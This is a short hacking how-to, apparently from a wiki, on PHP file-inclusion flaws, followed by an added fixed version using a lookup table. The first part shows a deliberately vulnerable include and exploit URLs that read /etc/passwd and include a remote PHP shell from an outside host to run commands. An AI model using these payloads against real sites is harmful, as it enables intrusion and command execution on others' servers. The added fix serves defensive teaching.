HOWTO-HACK - Attack with Remote File Include (RFI)
From wiki.morphey.org
This type of vulnerability is common on web sites that use many includes. Suppose, for instance, that index.php contains an include like this:
<?php
// ....
$page = $_GET['section'];
include($page); // the request value is used directly as the include path
// rest of the page
?>
Clearly, if we put any path in the GET variable "section", include will take it as the page to load, and that is all it takes:
http://[site_vuln]/index.php?section=../../../etc/passwd
With this URL, at the point in the page where the include sits, we will see the list of all the users of the machine. Nice, isn't it? :)
If we have a PHP shell, we can include it in this way:
http://[site_vuln]/index.php?section=http://myurl.com/myshell.txt?cmd=uname
and at the point in the page where the include sits we will see the result.
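The corrected form of the include above, as an added example that is not part of the original wiki page: the "section" value becomes a lookup key into a fixed table and never a path. The section names, the pages directory and the resolve_section() helper are assumptions made for illustration.

```php
<?php
// Added example, not from the original page. Names below are hypothetical.

// File names come only from this table; the request value is just a key.
const SECTIONS = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

// Return the absolute path to include for $requested, or null to refuse.
function resolve_section($requested, string $pagesDir): ?string
{
    if (!is_string($requested) || !array_key_exists($requested, SECTIONS)) {
        return null;                 // unknown key, array input, URL, ../ path
    }
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . '/' . SECTIONS[$requested]);
    if ($base === false || $path === false) {
        return null;                 // missing directory or page file
    }
    // Defence in depth: a symlinked page must not resolve outside $pagesDir.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Demo on constructed input: a throwaway pages directory with one page, then
// the two "section" values from the URLs above next to a legitimate one.
// In index.php the first argument would be $_GET['section'] ?? 'home'.
$pagesDir = sys_get_temp_dir() . '/rfi_demo_pages';
if (!is_dir($pagesDir)) {
    mkdir($pagesDir, 0700, true);
}
file_put_contents($pagesDir . '/home.php', '<?php echo "home page\n";');

$samples = [
    'home',
    '../../../etc/passwd',
    'http://myurl.com/myshell.txt?cmd=uname',
];
foreach ($samples as $value) {
    $file = resolve_section($value, $pagesDir);
    if ($file === null) {
        echo "rejected: $value\n";   // a real page would answer 404 here
        continue;
    }
    echo "accepted: $value -> ";
    include $file;
}
```

Setting allow_url_include=Off in php.ini stops the http:// case on its own but not the ../ path, which is why the lookup table is the actual fix.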
